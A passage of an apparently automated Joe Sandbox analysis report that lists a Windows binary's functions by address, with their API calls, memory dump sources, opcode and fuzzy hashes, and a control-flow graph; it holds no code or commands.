                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58106f669088608c9cbd8598d99cc0fc5f29460e3933b52be5d089bc7a8552cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A01B5B69403159BCB15AF65FC149667FA1F78A31B7000236EA0547362C734D861DF88
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2688 2f5320-2f5356 2689 2f5358-2f536b CreateEventW 2688->2689 2690 2f5386-2f53bc CreateThread 2688->2690 2691 2f536d-2f5376 2689->2691 2692 2f5379-2f5381 2689->2692 2693 2f549c-2f54c7 WaitForSingleObject GetExitCodeThread 2690->2693 2694 2f53c2-2f53d4 2690->2694 2691->2692 2692->2690 2697 2f54c9-2f54d0 CloseHandle 2693->2697 2698 2f54d7-2f54ea 2693->2698 2695 2f53d6-2f53dc 2694->2695 2696 2f5411-2f541a 2694->2696 2701 2f53e0-2f53e2 2695->2701 2699 2f541d-2f543a 2696->2699 2697->2698 2702 2f543c 2699->2702 2703 2f5480-2f548c 2699->2703 2704 2f54ed-2f552f call 1c7340 2701->2704 2705 2f53e8-2f53ea 2701->2705 2707 2f5440-2f5442 2702->2707 2760 2f548d call 2f0d10 2703->2760 2761 2f548d call 2f0e70 2703->2761 2762 2f548d call 2f0f60 2703->2762 2715 2f553a-2f5549 2704->2715 2716 2f5531-2f5534 WaitForSingleObject 2704->2716 2705->2704 2708 2f53f0-2f540d 2705->2708 2707->2704 2710 2f5448-2f544a 2707->2710 2708->2701 2712 2f540f 2708->2712 2710->2704 2714 2f5450-2f5457 2710->2714 2711 2f548f-2f5499 2711->2693 2712->2699 2714->2704 2717 2f545d-2f5463 2714->2717 2719 2f554b-2f554e 2715->2719 2720 2f5587-2f559a 2715->2720 2716->2715 2717->2704 2721 2f5469-2f547e 2717->2721 2722 2f5551-2f5558 2719->2722 2723 2f5697-2f56aa 2720->2723 2724 2f55a0-2f55a5 2720->2724 2721->2703 2721->2707 2725 2f56cf-2f56e9 call 1c7340 call 2f5500 2722->2725 2726 2f555e-2f5561 2722->2726 2724->2725 2727 2f55ab-2f55ae 2724->2727 2726->2725 2729 2f5567-2f5578 call 2d7bd0 2726->2729 2727->2725 2728 2f55b4-2f55c2 2727->2728 2731 2f55c4-2f55c9 2728->2731 2732 2f55d2-2f5605 call 1bcaf0 call 2b66d0 2728->2732 2739 2f557e-2f5585 2729->2739 2740 2f56ab-2f56b4 2729->2740 2731->2732 2745 2f560a-2f5625 2732->2745 2739->2720 2739->2722 2740->2723 2743 2f56b6-2f56ce 2740->2743 2746 2f562f-2f563a 2745->2746 2747 2f5627-2f562a 2745->2747 2750 2f564c 2746->2750 2751 2f563c-2f563f 2746->2751 2747->2746 2752 2f5651-2f5667 2750->2752 2753 2f5645-2f564a 2751->2753 2754 2f5641-2f5643 2751->2754 2756 2f5669-2f566f 2752->2756 2757 2f5672-2f5674 2752->2757 2753->2752 2754->2752 2756->2757 2757->2740 2758 2f5676-2f5691 2757->2758 2758->2723 2758->2724 2760->2711 2761->2711 2762->2711
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,DF534560,?,?,00000000,?,?,?,?,003BB91D,000000FF,?,002D985E), ref: 002F5360
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,002F56E0,?,00000000,?), ref: 002F5396
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 002F549F
                                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 002F54AA
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 002F54CA
                                                                                                                                                                                                                                                                            • Part of subcall function 001C7340: RaiseException.KERNEL32(DF534560,DF534560,00000000,00000000,002F56DB,C000008C,00000001,DF534560), ref: 001C734C
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,DF534560,00000000,?,?,00000001), ref: 002F5534
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateObjectSingleThreadWait$CloseCodeEventExceptionExitHandleRaise
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 4001640722-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: d5efec8e674ac248f276385d652e0687472d24214e5daa74eb34af3cb1de01db
                                                                                                                                                                                                                                                                          • Instruction ID: e3a0c949cafa1ad1abcbc306f72783219aa15083a0a257afcd4dd2f7fd733831
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5efec8e674ac248f276385d652e0687472d24214e5daa74eb34af3cb1de01db
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CD16D75A10A1A9FCB14CF68C884AAAFBF5FF48354F144269EA15EB361D730E950CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00276151
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0027620F
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,-00000010), ref: 00276224
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                                                                                                          • String ID: Kernel32.dll$b^4
                                                                                                                                                                                                                                                                          • API String ID: 1122257418-2935090243
                                                                                                                                                                                                                                                                          • Opcode ID: b7b364ab7e19163556bfd86bd29f94ba43aa32af219001b09e89fd51f424735e
                                                                                                                                                                                                                                                                          • Instruction ID: 914be9d408c00c447842c4c4a56edc6d11ba81a2376bff51fcc4dbc8b03a8bbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7b364ab7e19163556bfd86bd29f94ba43aa32af219001b09e89fd51f424735e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9A18AB0500A46EFE714CF64C818B9ABBF4FF05318F14825DE8199B6C1D7BAA619CF90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002E340A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                          • String ID: \$\$\
                                                                                                                                                                                                                                                                          • API String ID: 1705453755-3791832595
                                                                                                                                                                                                                                                                          • Opcode ID: e3b9bcc6b8c42576c73189ef88bcb4d1968a10575131cae0a7aa7bd69526dd8f
                                                                                                                                                                                                                                                                          • Instruction ID: b1011aad09a15eb0e5e7cfcd5948e443a51b295f1cf774959dc132bdc8a15afd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3b9bcc6b8c42576c73189ef88bcb4d1968a10575131cae0a7aa7bd69526dd8f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD412732D60382C6CB30DF268448AABB3F4FF95355F95466EE8C897180E7308E9583C6
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,AA831995,?), ref: 6A565266
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 6A56529E
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547AD0: HeapAlloc.KERNEL32(00000000,00000000,?,AA831995,00000000,6A58C150,000000FF,?,?,6A5C9EAC,?,6A565A1D,80004005), ref: 6A547B1A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$AllocCloseFileFirstHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2507753907-0
                                                                                                                                                                                                                                                                          • Opcode ID: 996362ccc256c971d20d196b3e5e421a9e78d12d5c9c07c3885129681b3f6a80
                                                                                                                                                                                                                                                                          • Instruction ID: 9238f08c2ea1a6aebb34d8dbf292d0b3ec3038addc6e35bc937635113be80dc4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996362ccc256c971d20d196b3e5e421a9e78d12d5c9c07c3885129681b3f6a80
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931D130984318DBDF24DF54C808B5EB7B4FB06724F11479EE926A72A1DB746940CB81
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,00000000), ref: 002B61FD
                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 002B625C
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1673784098-0
                                                                                                                                                                                                                                                                          • Opcode ID: 95e04233c370a364a89a053704084de374c77922dca283578b5bb6a792429757
                                                                                                                                                                                                                                                                          • Instruction ID: 17bba0c1d5a4992e8be6191a57d0c880948991c9f05013ee9151b2f40b1f4632
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95e04233c370a364a89a053704084de374c77922dca283578b5bb6a792429757
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31EF70914218DBEB25DF19C84CBAEF7B8EB49350F20826AED19A7380DB756D54CB80
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 275895251-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0dffbb1be7e6ae358d9edc96823d27ef74be3437ddd724cba12b6e6af6304ba5
                                                                                                                                                                                                                                                                          • Instruction ID: b5c5deb0e2a0fe9d186f453d218d38d94d4471455f993560e6c91c003a442fe6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dffbb1be7e6ae358d9edc96823d27ef74be3437ddd724cba12b6e6af6304ba5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E19E30A1064ADFDB11CFA8C884BAEB7F5FF44314F1482AAE915AB391D774AE05CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f90eed75c6420078eb2390ff65690ef3021b3351309e5ddb98d61d1ee80bed8a
                                                                                                                                                                                                                                                                          • Instruction ID: 2c4886378dc80edf1a81803409e7e8bc245f5ab5da4844e6320c88d8358a0ca9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90eed75c6420078eb2390ff65690ef3021b3351309e5ddb98d61d1ee80bed8a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B41BF30521B9A9FDB24DF68CD58BED77A5FF00310F548229E8159B2D1DB74AE14CB40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,DF534560,DF534560,?,?,?,?,00000000), ref: 002F0679
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,DF534560,DF534560,?,?,?,?,00000000,00371875), ref: 002F069A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Create$FileNamedPipe
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1328467360-0
                                                                                                                                                                                                                                                                          • Opcode ID: e718cc3dd5904fd4f9ef4a44d98b90ed2d8a9aaadc1b721b8a36b242b54a627e
                                                                                                                                                                                                                                                                          • Instruction ID: 5b3638b741a01e7532934f075b0401b59baaf19a35037cf713b4968bc0eadfab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e718cc3dd5904fd4f9ef4a44d98b90ed2d8a9aaadc1b721b8a36b242b54a627e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D431D132A8474AAFE721CF14CC05BA9FBA8EB01760F10822EF969966D1D771A950CB44
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __set_se_translator.LIBVCRUNTIME ref: 001E6D68
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(002B4F70), ref: 001E6D7E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2480343447-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2640c586268e69b44d04704133434dfd8bcbda16c126669114b1ac8bd62883ee
                                                                                                                                                                                                                                                                          • Instruction ID: 2f9fbefa94a43a0a14e4d52dde50447fa715a32126c57fc35ce1af9d92b7e9e1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2640c586268e69b44d04704133434dfd8bcbda16c126669114b1ac8bd62883ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1E07D366403406ED701A791BC49FDB3F94EB97B11F054026F5446B163C370A440C3A2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,6A545777,00000004,00000034,?,?,00000000,6A545777), ref: 6A5456BB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdaptersInfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177971545-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4d4907d4ed9876511bbee467219406aafe0e8e02976798527ff378ece9f731e9
                                                                                                                                                                                                                                                                          • Instruction ID: 2b27ba286c93d0e78fd7aa8307c6d88c7cab1134c7674b6a392483ee743376fb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4907d4ed9876511bbee467219406aafe0e8e02976798527ff378ece9f731e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21F671601201AFE368CE28CD98A1AB7EAFBC5300F508A3EE506C7644DF70BC048750
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 275895251-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5aff01162672ac197748696b69125fc239c06a97924343cb9dd36f3fbeb43ff7
                                                                                                                                                                                                                                                                          • Instruction ID: 108f169e656bc07feead2960dfd27abe4d6859a9f43df5e1afe3c2c99209a7c3
